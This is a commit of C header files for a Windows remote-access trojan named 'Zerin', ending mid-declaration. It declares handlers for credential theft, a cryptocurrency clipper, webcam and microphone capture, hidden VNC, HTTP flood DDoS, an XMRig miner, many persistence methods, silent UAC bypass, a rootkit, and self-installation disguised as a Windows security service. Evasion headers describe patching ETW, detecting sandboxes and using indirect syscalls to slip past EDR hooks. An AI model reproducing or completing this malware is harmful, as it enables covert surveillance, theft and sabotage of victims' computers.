initial commit
This commit is contained in:
Executable
+95
@@ -0,0 +1,95 @@
|
||||
// Auto-generated by generate_cmd_hashes.py - DO NOT EDIT
|
||||
#ifndef CMD_HASHES_GEN_H
|
||||
#define CMD_HASHES_GEN_H
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
static inline uint32_t fnv1a_hash(const char *s) {
|
||||
uint32_t h = 0x811c9dc5u;
|
||||
for (; *s; s++) {
|
||||
h ^= (uint8_t)*s;
|
||||
h *= 0x01000193u;
|
||||
}
|
||||
return h;
|
||||
}
|
||||
|
||||
#define CMD_HASH_SHELL 0x11e1fc01u // "shell"
|
||||
#define CMD_HASH_WHOAMI 0xbaa8b444u // "whoami"
|
||||
#define CMD_HASH_PS 0x5e4e6e94u // "ps"
|
||||
#define CMD_HASH_LS 0x5631dfe8u // "ls"
|
||||
#define CMD_HASH_CD 0x5b299902u // "cd"
|
||||
#define CMD_HASH_PWD 0x556dfd44u // "pwd"
|
||||
#define CMD_HASH_UPLOAD 0x3c5c055cu // "upload"
|
||||
#define CMD_HASH_DOWNLOAD 0x3108b3f9u // "download"
|
||||
#define CMD_HASH_SCREENSHOT 0xe822c431u // "screenshot"
|
||||
#define CMD_HASH_NETSTAT 0x8641626au // "netstat"
|
||||
#define CMD_HASH_IFCONFIG 0x4aa92ce0u // "ifconfig"
|
||||
#define CMD_HASH_REG_READ 0xc72252d6u // "reg_read"
|
||||
#define CMD_HASH_REG_WRITE 0xabc534f9u // "reg_write"
|
||||
#define CMD_HASH_PERSIST_RUNKEY 0x9473a758u // "persist_runkey"
|
||||
#define CMD_HASH_PERSIST_SCHTASK 0x6530d0d3u // "persist_schtask"
|
||||
#define CMD_HASH_PERSIST_SERVICE 0x0e672827u // "persist_service"
|
||||
#define CMD_HASH_ENV 0x788e8bb4u // "env"
|
||||
#define CMD_HASH_SYSINFO 0xcfcf4cc6u // "sysinfo"
|
||||
#define CMD_HASH_PERSIST_STARTUP 0x40dfb5c5u // "persist_startup"
|
||||
#define CMD_HASH_PERSIST_LOGONSCRIPT 0xc1b2c568u // "persist_logonscript"
|
||||
#define CMD_HASH_PERSIST_SCREENSAVER 0x47d4c41du // "persist_screensaver"
|
||||
#define CMD_HASH_PERSIST_IFEO 0x54ca1bf7u // "persist_ifeo"
|
||||
#define CMD_HASH_PERSIST_BITS 0xb9b6b8c4u // "persist_bits"
|
||||
#define CMD_HASH_PERSIST_COM 0x8e03e859u // "persist_com"
|
||||
#define CMD_HASH_PERSIST_DLLHIJACK 0x6a8fb06cu // "persist_dllhijack"
|
||||
#define CMD_HASH_PERSIST_WMI 0x2be524afu // "persist_wmi"
|
||||
#define CMD_HASH_PERSIST_PORTMON 0xbe42648fu // "persist_portmon"
|
||||
#define CMD_HASH_PERSIST_SSP 0xc0da6796u // "persist_ssp"
|
||||
#define CMD_HASH_DELETE 0x67c2444au // "delete"
|
||||
#define CMD_HASH_ENCRYPT 0x82cac862u // "encrypt"
|
||||
#define CMD_HASH_DECRYPT 0xac13bc9au // "decrypt"
|
||||
#define CMD_HASH_EXECUTE 0xa01e3d98u // "execute"
|
||||
#define CMD_HASH_UNINSTALL 0xd15eb499u // "uninstall"
|
||||
#define CMD_HASH_RESTART 0xfe9c11ecu // "restart"
|
||||
#define CMD_HASH_SHUTDOWN 0xf8206a4bu // "shutdown"
|
||||
#define CMD_HASH_TROLL_MSGBOX 0xf6b0da8bu // "troll_msgbox"
|
||||
#define CMD_HASH_TROLL_TTS 0xb92fcd5eu // "troll_tts"
|
||||
#define CMD_HASH_TROLL_WEBSITE 0xea9769a6u // "troll_website"
|
||||
#define CMD_HASH_TROLL_WALLPAPER 0x361b9145u // "troll_wallpaper"
|
||||
#define CMD_HASH_TROLL_TASKBAR 0xcb614b5du // "troll_taskbar"
|
||||
#define CMD_HASH_TROLL_CD_TRAY 0x28ec819fu // "troll_cd_tray"
|
||||
#define CMD_HASH_CHAT 0xa24bf9abu // "chat"
|
||||
#define CMD_HASH_ROOTKIT_STATUS 0xaf4d6dfau // "rootkit_status"
|
||||
#define CMD_HASH_ROOTKIT_INJECT 0x14be2ed1u // "rootkit_inject"
|
||||
#define CMD_HASH_ROOTKIT_INJECT_ALL 0x0f180711u // "rootkit_inject_all"
|
||||
#define CMD_HASH_VNC_START 0x8d84f5ddu // "vnc_start"
|
||||
#define CMD_HASH_VNC_STOP 0x8a7703cfu // "vnc_stop"
|
||||
#define CMD_HASH_HVNC_START 0x99f0682bu // "hvnc_start"
|
||||
#define CMD_HASH_HVNC_STOP 0x5b4bc999u // "hvnc_stop"
|
||||
#define CMD_HASH_HVNC_EXEC 0x342b6540u // "hvnc_exec"
|
||||
#define CMD_HASH_POWERSHELL 0xba13e3d8u // "powershell"
|
||||
#define CMD_HASH_KILL 0xc50f4599u // "kill"
|
||||
#define CMD_HASH_WINDOWS 0xd59726eau // "windows"
|
||||
#define CMD_HASH_INSTALLED_APPS 0x3a88eeceu // "installed_apps"
|
||||
#define CMD_HASH_SPECS 0xa27c87b7u // "specs"
|
||||
#define CMD_HASH_TROLL_SWAPMOUSE 0x8cc1f8f9u // "troll_swapmouse"
|
||||
#define CMD_HASH_TROLL_DISABLESOUND 0xff756fdeu // "troll_disablesound"
|
||||
#define CMD_HASH_TROLL_BLACKSCREEN 0x13b0f13cu // "troll_blackscreen"
|
||||
#define CMD_HASH_TROLL_DISABLEKEYBOARD 0x180e5bf6u // "troll_disablekeyboard"
|
||||
#define CMD_HASH_TROLL_DISABLEMOUSE 0x5b3a6632u // "troll_disablemouse"
|
||||
#define CMD_HASH_TROLL_REROUTESITES 0x07e81e6bu // "troll_reroutesites"
|
||||
#define CMD_HASH_CREDS 0xd7cf5f56u // "creds"
|
||||
#define CMD_HASH_CLIPPER_START 0xf5a6ba85u // "clipper_start"
|
||||
#define CMD_HASH_CLIPPER_STOP 0x4dacf7d7u // "clipper_stop"
|
||||
#define CMD_HASH_CLIPPER_CONFIG 0x9598ae9du // "clipper_config"
|
||||
#define CMD_HASH_WEBCAM_START 0x20f4f1afu // "webcam_start"
|
||||
#define CMD_HASH_WEBCAM_STOP 0x803e5ef5u // "webcam_stop"
|
||||
#define CMD_HASH_WEBCAM_LIST 0xdedff6f1u // "webcam_list"
|
||||
#define CMD_HASH_MIC_START 0x0a6d49b7u // "mic_start"
|
||||
#define CMD_HASH_MIC_STOP 0x40355c1du // "mic_stop"
|
||||
#define CMD_HASH_SOCKS5_START 0xd014acfeu // "socks5_start"
|
||||
#define CMD_HASH_SOCKS5_STOP 0x6d3ba286u // "socks5_stop"
|
||||
#define CMD_HASH_DDOS_START 0x22ec5614u // "ddos_start"
|
||||
#define CMD_HASH_DDOS_STOP 0x7202bfd0u // "ddos_stop"
|
||||
#define CMD_HASH_MINER_START 0x81844fabu // "miner_start"
|
||||
#define CMD_HASH_MINER_STOP 0x6d56f419u // "miner_stop"
|
||||
#define CMD_HASH_MINER_STATUS 0x301d5e0bu // "miner_status"
|
||||
#define CMD_HASH_ELEVATE 0x4ce1977du // "elevate"
|
||||
|
||||
#endif // CMD_HASHES_GEN_H
|
||||
Executable
+155
@@ -0,0 +1,155 @@
|
||||
#ifndef ZERIN_COMMANDS_H
|
||||
#define ZERIN_COMMANDS_H
|
||||
|
||||
#include "protocol.h"
|
||||
#include "config.h"
|
||||
|
||||
// Command handler function type
|
||||
typedef int (*command_handler_fn)(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Command dispatch — routes task.command to the right handler
|
||||
int command_dispatch(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Individual command handlers
|
||||
int cmd_shell(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_whoami(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_ps(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_ls(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_cd(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_pwd(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_upload(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_download(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Phase 2 — enhanced commands
|
||||
int cmd_screenshot(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_netstat(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_ifconfig(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_reg_read(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_reg_write(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_runkey(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_schtask(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_service(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_env(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_sysinfo(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Advanced persistence methods
|
||||
int cmd_persist_startup(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_logonscript(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_screensaver(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_ifeo(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_bits(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_com(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_dllhijack(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_wmi(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_portmon(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_persist_ssp(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// File actions — delete, encrypt, decrypt, execute
|
||||
int cmd_delete(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_encrypt(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_decrypt(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_execute(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Auto-persistence + uninstall
|
||||
int cmd_uninstall(const task_t *task, task_result_t *result, char *cwd);
|
||||
void persist_auto_install(zerin_config_t *cfg);
|
||||
void persist_self_copy(zerin_config_t *cfg);
|
||||
|
||||
// Rootkit commands
|
||||
int cmd_rootkit_status(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_rootkit_inject(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_rootkit_inject_all(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// VNC (remote desktop)
|
||||
int cmd_vnc_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_vnc_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
void vnc_cleanup(void);
|
||||
|
||||
// hVNC (hidden virtual desktop)
|
||||
int cmd_hvnc_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_hvnc_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_hvnc_exec(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Power commands
|
||||
int cmd_restart(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_shutdown(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Troll commands
|
||||
int cmd_troll_msgbox(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_tts(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_website(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_wallpaper(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_taskbar(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_cd_tray(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_swapmouse(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_disablesound(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_blackscreen(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_disablekeyboard(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_disablemouse(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_troll_reroutesites(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Chat
|
||||
int cmd_chat(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Powershell
|
||||
int cmd_powershell(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Kill process
|
||||
int cmd_kill(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Window enumeration
|
||||
int cmd_windows(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Installed applications
|
||||
int cmd_installed_apps(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// System specs
|
||||
int cmd_specs(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// AV detection (shared with recon)
|
||||
void get_av_product(char *buf, size_t len);
|
||||
|
||||
// Credential recovery
|
||||
int cmd_creds(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Crypto clipper
|
||||
int cmd_clipper_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_clipper_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_clipper_config(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Webcam
|
||||
int cmd_webcam_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_webcam_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_webcam_list(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Microphone
|
||||
int cmd_mic_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_mic_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// UAC elevation
|
||||
int cmd_elevate(const task_t *task, task_result_t *result, char *cwd);
|
||||
void maybe_auto_elevate(void);
|
||||
|
||||
// SOCKS5 reverse proxy
|
||||
int cmd_socks5_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_socks5_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
void socks5_cleanup(void);
|
||||
|
||||
// DDoS HTTP flood
|
||||
int cmd_ddos_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_ddos_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Cryptominer (XMRig)
|
||||
int cmd_miner_start(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_miner_stop(const task_t *task, task_result_t *result, char *cwd);
|
||||
int cmd_miner_status(const task_t *task, task_result_t *result, char *cwd);
|
||||
|
||||
// Utility
|
||||
bool is_elevated(void);
|
||||
|
||||
// Recon — gather system info for checkin
|
||||
int recon_gather_checkin(checkin_t *ci, const char *agent_id,
|
||||
uint32_t sleep_interval, uint32_t jitter_percent,
|
||||
int64_t kill_date);
|
||||
|
||||
#endif // ZERIN_COMMANDS_H
|
||||
Executable
+84
@@ -0,0 +1,84 @@
|
||||
#ifndef ZERIN_CONFIG_H
|
||||
#define ZERIN_CONFIG_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdbool.h>
|
||||
|
||||
#define ZERIN_MAX_URLS 4
|
||||
#define ZERIN_MAX_URL_LEN 512
|
||||
/* WARNING: XOR is placeholder encryption only — trivially reversible.
|
||||
* This should be replaced with ChaCha20 (or similar) once the builder
|
||||
* is updated to match. Do not rely on this for any real confidentiality. */
|
||||
#define CONFIG_XOR_KEY 0xAB
|
||||
|
||||
// Persistence method flags (auto-install on first run)
|
||||
#define PERSIST_RUNKEY 0x0001
|
||||
#define PERSIST_SCHTASK 0x0002
|
||||
#define PERSIST_SERVICE 0x0004
|
||||
#define PERSIST_STARTUP 0x0008
|
||||
#define PERSIST_LOGONSCRIPT 0x0010
|
||||
#define PERSIST_SCREENSAVER 0x0020
|
||||
#define PERSIST_IFEO 0x0040
|
||||
#define PERSIST_BITS 0x0080
|
||||
#define PERSIST_COM 0x0100
|
||||
#define PERSIST_WMI 0x0200
|
||||
#define PERSIST_PORTMON 0x0400
|
||||
#define PERSIST_SSP 0x0800
|
||||
|
||||
#define PERSIST_ADMIN_MASK 0x0E44 // SERVICE|IFEO|WMI|PORTMON|SSP
|
||||
|
||||
typedef struct {
|
||||
// Callback URLs (failover list)
|
||||
char callback_urls[ZERIN_MAX_URLS][ZERIN_MAX_URL_LEN];
|
||||
uint32_t num_urls;
|
||||
|
||||
// Crypto keys (compiled in)
|
||||
uint8_t server_pubkey[32]; // Server's X25519 public key
|
||||
uint8_t agent_privkey[32]; // Agent's X25519 private key
|
||||
uint8_t agent_pubkey[32]; // Agent's X25519 public key
|
||||
|
||||
// Agent identity
|
||||
char agent_id[37]; // UUID string
|
||||
|
||||
// Timing
|
||||
uint32_t sleep_interval; // Seconds between beacons
|
||||
uint32_t jitter_percent; // 0-50
|
||||
int64_t kill_date; // Unix timestamp, 0 = no kill date
|
||||
|
||||
// HTTP
|
||||
char user_agent[256];
|
||||
|
||||
// Persistence
|
||||
uint32_t persist_methods; // Bitmask of methods to auto-install
|
||||
|
||||
// Rootkit
|
||||
uint32_t rootkit_enabled; // Enable r77-style rootkit features
|
||||
|
||||
// Auto-elevation
|
||||
uint32_t auto_elevate; // Attempt silent UAC bypass at startup
|
||||
|
||||
// Install location (self-copy)
|
||||
uint32_t install_dir; // Base dir: 0=TEMP, 1=LOCALAPPDATA, 2=APPDATA, 3=PROGRAMDATA, 4=USERPROFILE
|
||||
char install_subdir[64]; // Subfolder (e.g. "Microsoft\\WindowsUpdate")
|
||||
char install_filename[64]; // Exe filename (e.g. "SecurityHealthService.exe")
|
||||
} zerin_config_t;
|
||||
|
||||
// Initialize config with compiled-in defaults
|
||||
int config_init(zerin_config_t *cfg);
|
||||
|
||||
// Validate config values
|
||||
bool config_validate(const zerin_config_t *cfg);
|
||||
|
||||
// Update config from server command
|
||||
void config_update_sleep(zerin_config_t *cfg, uint32_t interval, uint32_t jitter);
|
||||
|
||||
// Check if kill date has passed
|
||||
bool config_is_expired(const zerin_config_t *cfg);
|
||||
|
||||
// XOR decrypt config blob
|
||||
void config_decrypt(uint8_t *data, size_t len, uint8_t key);
|
||||
|
||||
// Derive a per-machine unique agent ID from build ID + hardware fingerprint
|
||||
void config_derive_machine_id(zerin_config_t *cfg);
|
||||
|
||||
#endif // ZERIN_CONFIG_H
|
||||
Executable
+129
@@ -0,0 +1,129 @@
|
||||
#ifndef ZERIN_CRYPTO_H
|
||||
#define ZERIN_CRYPTO_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
#define CRYPTO_KEY_SIZE 32
|
||||
#define CRYPTO_NONCE_SIZE 12
|
||||
#define CRYPTO_TAG_SIZE 16
|
||||
#define CRYPTO_SHA256_SIZE 32
|
||||
#define CRYPTO_X25519_KEY 32
|
||||
|
||||
// ============================================================================
|
||||
// Random
|
||||
// ============================================================================
|
||||
int crypto_random_bytes(uint8_t *buf, size_t len);
|
||||
double crypto_random_float(void); // [0.0, 1.0)
|
||||
|
||||
// ============================================================================
|
||||
// SHA-256
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint32_t state[8];
|
||||
uint64_t bitcount;
|
||||
uint8_t buffer[64];
|
||||
uint32_t buflen;
|
||||
} sha256_ctx_t;
|
||||
|
||||
void sha256_init(sha256_ctx_t *ctx);
|
||||
void sha256_update(sha256_ctx_t *ctx, const uint8_t *data, size_t len);
|
||||
void sha256_final(sha256_ctx_t *ctx, uint8_t out[32]);
|
||||
void sha256(const uint8_t *data, size_t len, uint8_t out[32]);
|
||||
|
||||
// HMAC-SHA256
|
||||
void hmac_sha256(const uint8_t *key, size_t key_len,
|
||||
const uint8_t *data, size_t data_len,
|
||||
uint8_t out[32]);
|
||||
|
||||
// ============================================================================
|
||||
// HKDF (RFC 5869)
|
||||
// ============================================================================
|
||||
int hkdf_extract(const uint8_t *salt, size_t salt_len,
|
||||
const uint8_t *ikm, size_t ikm_len,
|
||||
uint8_t prk[32]);
|
||||
|
||||
int hkdf_expand(const uint8_t prk[32],
|
||||
const uint8_t *info, size_t info_len,
|
||||
uint8_t *okm, size_t okm_len);
|
||||
|
||||
int hkdf_derive(const uint8_t *salt, size_t salt_len,
|
||||
const uint8_t *ikm, size_t ikm_len,
|
||||
const uint8_t *info, size_t info_len,
|
||||
uint8_t *okm, size_t okm_len);
|
||||
|
||||
// ============================================================================
|
||||
// X25519 (RFC 7748)
|
||||
// ============================================================================
|
||||
void x25519_clamp(uint8_t key[32]);
|
||||
int x25519_keygen(uint8_t privkey[32], uint8_t pubkey[32]);
|
||||
int x25519_shared_secret(const uint8_t privkey[32],
|
||||
const uint8_t peer_pubkey[32],
|
||||
uint8_t shared[32]);
|
||||
|
||||
// ============================================================================
|
||||
// ChaCha20 (RFC 8439)
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint32_t state[16];
|
||||
} chacha20_ctx_t;
|
||||
|
||||
void chacha20_init(chacha20_ctx_t *ctx, const uint8_t key[32],
|
||||
const uint8_t nonce[12], uint32_t counter);
|
||||
void chacha20_encrypt(chacha20_ctx_t *ctx, const uint8_t *in,
|
||||
uint8_t *out, size_t len);
|
||||
|
||||
// ============================================================================
|
||||
// Poly1305 (RFC 8439)
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint32_t r[5];
|
||||
uint32_t h[5];
|
||||
uint32_t pad[4];
|
||||
uint8_t buffer[16];
|
||||
size_t buflen;
|
||||
size_t total;
|
||||
} poly1305_ctx_t;
|
||||
|
||||
void poly1305_init(poly1305_ctx_t *ctx, const uint8_t key[32]);
|
||||
void poly1305_update(poly1305_ctx_t *ctx, const uint8_t *data, size_t len);
|
||||
void poly1305_final(poly1305_ctx_t *ctx, uint8_t tag[16]);
|
||||
|
||||
// ============================================================================
|
||||
// ChaCha20-Poly1305 AEAD (RFC 8439)
|
||||
// ============================================================================
|
||||
|
||||
// Encrypt: returns ciphertext_len (plaintext_len + 16 for tag)
|
||||
// out must have room for plaintext_len + CRYPTO_TAG_SIZE
|
||||
int aead_encrypt(const uint8_t key[32], const uint8_t nonce[12],
|
||||
const uint8_t *aad, size_t aad_len,
|
||||
const uint8_t *plaintext, size_t plaintext_len,
|
||||
uint8_t *out);
|
||||
|
||||
// Decrypt: returns 0 on success, -1 on auth failure
|
||||
// out must have room for ciphertext_len - CRYPTO_TAG_SIZE
|
||||
int aead_decrypt(const uint8_t key[32], const uint8_t nonce[12],
|
||||
const uint8_t *aad, size_t aad_len,
|
||||
const uint8_t *ciphertext, size_t ciphertext_len,
|
||||
uint8_t *out);
|
||||
|
||||
// ============================================================================
|
||||
// Key Exchange
|
||||
// ============================================================================
|
||||
typedef struct {
|
||||
uint8_t agent_pubkey_hash[32]; // SHA256(agent_pubkey)
|
||||
uint8_t ephemeral_pubkey[32];
|
||||
uint8_t ephemeral_privkey[32]; // NOT sent
|
||||
uint8_t session_key[32];
|
||||
} key_exchange_t;
|
||||
|
||||
int key_exchange_init(key_exchange_t *kx, const uint8_t agent_pubkey[32]);
|
||||
int key_exchange_derive(key_exchange_t *kx, const uint8_t server_pubkey[32]);
|
||||
|
||||
// ============================================================================
|
||||
// Utility
|
||||
// ============================================================================
|
||||
void secure_zero(void *ptr, size_t len);
|
||||
int constant_time_compare(const uint8_t *a, const uint8_t *b, size_t len);
|
||||
|
||||
#endif // ZERIN_CRYPTO_H
|
||||
Executable
+46
@@ -0,0 +1,46 @@
|
||||
#ifndef DXGI_CAPTURE_H
|
||||
#define DXGI_CAPTURE_H
|
||||
|
||||
#ifdef _WIN32
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdint.h>
|
||||
|
||||
typedef struct dxgi_ctx dxgi_ctx_t;
|
||||
|
||||
/* Initialize DXGI Desktop Duplication.
|
||||
* Returns context on success, NULL on failure (e.g., no GPU, RDP session).
|
||||
* Dynamically loads d3d11.dll and dxgi.dll — no link-time dependencies. */
|
||||
dxgi_ctx_t *dxgi_init(void);
|
||||
|
||||
/* Capture current frame via Desktop Duplication.
|
||||
* Returns:
|
||||
* 0 = success, pixels/width/height/dirty_rects/num_dirty filled
|
||||
* 1 = no change (timeout, screen idle) — caller should skip frame
|
||||
* -1 = error (ACCESS_LOST, device removed, etc.) — caller should reinit or fallback
|
||||
*
|
||||
* On success, pixels points to tightly-packed RGB (3 bytes/pixel, top-down).
|
||||
* dirty_rects points to an internal array valid until the next call. */
|
||||
int dxgi_capture(dxgi_ctx_t *ctx, uint8_t **pixels, int *width, int *height,
|
||||
RECT **dirty_rects, int *num_dirty);
|
||||
|
||||
/* Capture frame returning raw mapped BGRA pointer (no RGB conversion).
|
||||
* Returns:
|
||||
* 0 = success, bgra_data/row_pitch/width/height/dirty_rects/num_dirty filled
|
||||
* 1 = no change (timeout)
|
||||
* -1 = error
|
||||
*
|
||||
* On success, bgra_data points to mapped GPU memory (BGRA, 4 bytes/pixel).
|
||||
* Caller MUST call dxgi_release_frame() when done reading the data. */
|
||||
int dxgi_capture_mapped(dxgi_ctx_t *ctx, const uint8_t **bgra_data,
|
||||
int *row_pitch, int *width, int *height,
|
||||
RECT **dirty_rects, int *num_dirty);
|
||||
|
||||
/* Release the acquired frame (must be called after dxgi_capture/dxgi_capture_mapped returns 0). */
|
||||
void dxgi_release_frame(dxgi_ctx_t *ctx);
|
||||
|
||||
/* Clean up all DXGI/D3D11 resources. */
|
||||
void dxgi_cleanup(dxgi_ctx_t *ctx);
|
||||
|
||||
#endif /* _WIN32 */
|
||||
#endif /* DXGI_CAPTURE_H */
|
||||
Executable
+1062
File diff suppressed because it is too large
Load Diff
Executable
+24
@@ -0,0 +1,24 @@
|
||||
#ifndef ZERIN_EVASION_H
|
||||
#define ZERIN_EVASION_H
|
||||
|
||||
#include "strings.h"
|
||||
#include "syscalls.h"
|
||||
#include "sleep_obf.h"
|
||||
#include "indirect_syscalls.h"
|
||||
#include "rootkit.h"
|
||||
|
||||
// Initialize all evasion subsystems.
|
||||
// Call once early in agent startup.
|
||||
int evasion_init(void);
|
||||
|
||||
// Patch EtwEventWrite to prevent runtime telemetry.
|
||||
int evasion_patch_etw(void);
|
||||
|
||||
// Check for VM/sandbox environment (score-based detection).
|
||||
// Returns 1 if sandbox detected, 0 if clean.
|
||||
int evasion_check_vm(void);
|
||||
|
||||
// Clean up evasion state.
|
||||
void evasion_cleanup(void);
|
||||
|
||||
#endif // ZERIN_EVASION_H
|
||||
Executable
+97
@@ -0,0 +1,97 @@
|
||||
#ifndef ZERIN_INDIRECT_SYSCALLS_H
|
||||
#define ZERIN_INDIRECT_SYSCALLS_H
|
||||
|
||||
#ifdef _WIN32
|
||||
|
||||
#include <windows.h>
|
||||
#include <winternl.h>
|
||||
|
||||
// ============================================================================
|
||||
// Indirect Syscalls
|
||||
//
|
||||
// Instead of calling Nt* functions through ntdll (where EDR inline hooks
|
||||
// intercept every call), we:
|
||||
// 1. Extract the System Service Number (SSN) from ntdll's stub bytes
|
||||
// 2. Find a clean "syscall; ret" gadget inside ntdll's .text section
|
||||
// 3. Set EAX = SSN, R10 = first arg, then JMP to the gadget
|
||||
//
|
||||
// The return address on the call stack points into ntdll's address range,
|
||||
// so EDR call-stack inspection sees a legitimate origin.
|
||||
//
|
||||
// Halo's Gate: If a stub is hooked (first bytes overwritten), we scan
|
||||
// neighboring syscall stubs (SSN ± offset) to calculate the correct SSN.
|
||||
// ============================================================================
|
||||
|
||||
// Initialize the indirect syscall table.
|
||||
// Must be called once during agent startup (after PEB is accessible).
|
||||
// Returns 0 on success, -1 on failure.
|
||||
int indirect_syscalls_init(void);
|
||||
|
||||
// Check if indirect syscalls were initialized successfully.
|
||||
int indirect_syscalls_ready(void);
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
// Wrapper functions — same signatures as the real Nt* functions.
|
||||
// Implemented as naked assembly stubs that dispatch via SSN + gadget JMP.
|
||||
// ---------------------------------------------------------------------------
|
||||
|
||||
NTSTATUS sc_NtAllocateVirtualMemory(
|
||||
HANDLE ProcessHandle,
|
||||
PVOID *BaseAddress,
|
||||
ULONG_PTR ZeroBits,
|
||||
PSIZE_T RegionSize,
|
||||
ULONG AllocationType,
|
||||
ULONG Protect
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtProtectVirtualMemory(
|
||||
HANDLE ProcessHandle,
|
||||
PVOID *BaseAddress,
|
||||
PSIZE_T RegionSize,
|
||||
ULONG NewProtect,
|
||||
PULONG OldProtect
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtWriteVirtualMemory(
|
||||
HANDLE ProcessHandle,
|
||||
PVOID BaseAddress,
|
||||
PVOID Buffer,
|
||||
SIZE_T NumberOfBytesToWrite,
|
||||
PSIZE_T NumberOfBytesWritten
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtCreateThreadEx(
|
||||
PHANDLE ThreadHandle,
|
||||
ACCESS_MASK DesiredAccess,
|
||||
PVOID ObjectAttributes,
|
||||
HANDLE ProcessHandle,
|
||||
PVOID StartRoutine,
|
||||
PVOID Argument,
|
||||
ULONG CreateFlags,
|
||||
SIZE_T ZeroBits,
|
||||
SIZE_T StackSize,
|
||||
SIZE_T MaximumStackSize,
|
||||
PVOID AttributeList
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtClose(
|
||||
HANDLE Handle
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtQueryInformationProcess(
|
||||
HANDLE ProcessHandle,
|
||||
ULONG ProcessInformationClass,
|
||||
PVOID ProcessInformation,
|
||||
ULONG ProcessInformationLength,
|
||||
PULONG ReturnLength
|
||||
);
|
||||
|
||||
NTSTATUS sc_NtFreeVirtualMemory(
|
||||
